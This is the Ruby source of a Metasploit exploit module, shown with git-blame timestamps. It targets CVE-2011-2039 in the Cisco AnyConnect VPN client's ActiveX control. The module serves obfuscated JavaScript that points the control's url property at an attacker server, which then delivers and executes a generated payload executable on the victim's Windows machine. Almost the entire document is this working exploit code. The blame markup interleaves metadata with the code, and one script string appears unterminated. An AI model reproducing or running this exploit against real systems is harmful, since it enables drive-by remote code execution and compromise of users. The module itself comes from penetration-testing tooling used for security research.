2011-06-06 18:52:26 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-06-06 18:52:26 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
|
include Msf::Exploit::EXE
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a vulnerability in the Cisco AnyConnect VPN client
|
|
|
|
|
vpnweb.ocx ActiveX control. This control is typically used to install the
|
|
|
|
|
VPN client. An attacker can set the 'url' property which is where the control
|
|
|
|
|
tries to locate the files needed to install the client.
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
The control tries to download two files from the site specified within the
|
|
|
|
|
'url' property. One of these files it will be stored in a temporary directory and
|
|
|
|
|
executed.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => [ 'bannedit' ],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'CVE', '2011-2039' ],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '72714'],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909' ],
|
|
|
|
|
[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml'],
|
|
|
|
|
],
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'Automatic',
|
|
|
|
|
{
|
|
|
|
|
'Arch' => ARCH_X86
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
],
|
|
|
|
|
'DisclosureDate' => 'Jun 01 2011',
|
|
|
|
|
'DefaultTarget' => 0))
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
|
|
|
|
|
], self.class)
|
|
|
|
|
end
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def on_request_uri(cli, request)
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if request.uri.match(/vpndownloader\.exe/)
|
|
|
|
|
exe = generate_payload_exe({:code => payload.encoded})
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Client requested: #{request.uri}. Sending vpndownloader.exe")
|
|
|
|
|
send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' })
|
|
|
|
|
select(nil, nil, nil, 5) # let the file download
|
|
|
|
|
handler(cli)
|
|
|
|
|
return
|
|
|
|
|
end
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if request.uri.match(/updates\.txt/)
|
|
|
|
|
print_status("Client requested: #{request.uri}. Sending updates.txt")
|
|
|
|
|
updates = rand_text_alpha((rand(500) + 1)) + "\n" + rand_text_alpha((rand(500) + 1))
|
|
|
|
|
send_response(cli, updates, { 'Content-Type' => 'text/plain' })
|
|
|
|
|
return
|
|
|
|
|
end
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
url = get_uri(cli)
|
2011-06-06 18:52:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
dir = rand_text_alpha((rand(40) + 1))
|
|
|
|
|
js = ::Rex::Exploitation::JSObfu.new %Q|
|
|
|
|
|
var x = document.createElement("object");
|
|
|
|
|
x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
|
|
|
|
|
x.url = "#{url}/#{dir}/";
|
2011-06-06 18:52:26 +00:00
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
js.obfuscate
|
|
|
|
|
html = "<html>\n\t<script>#{js}\t</script>\n</html>"
|
|
|
|
|
print_status("Sending #{self.name}")
|
|
|
|
|
send_response_html(cli, html)
|
|
|
|
|
end
|
2011-10-17 03:49:49 +00:00
|
|
|
end
|
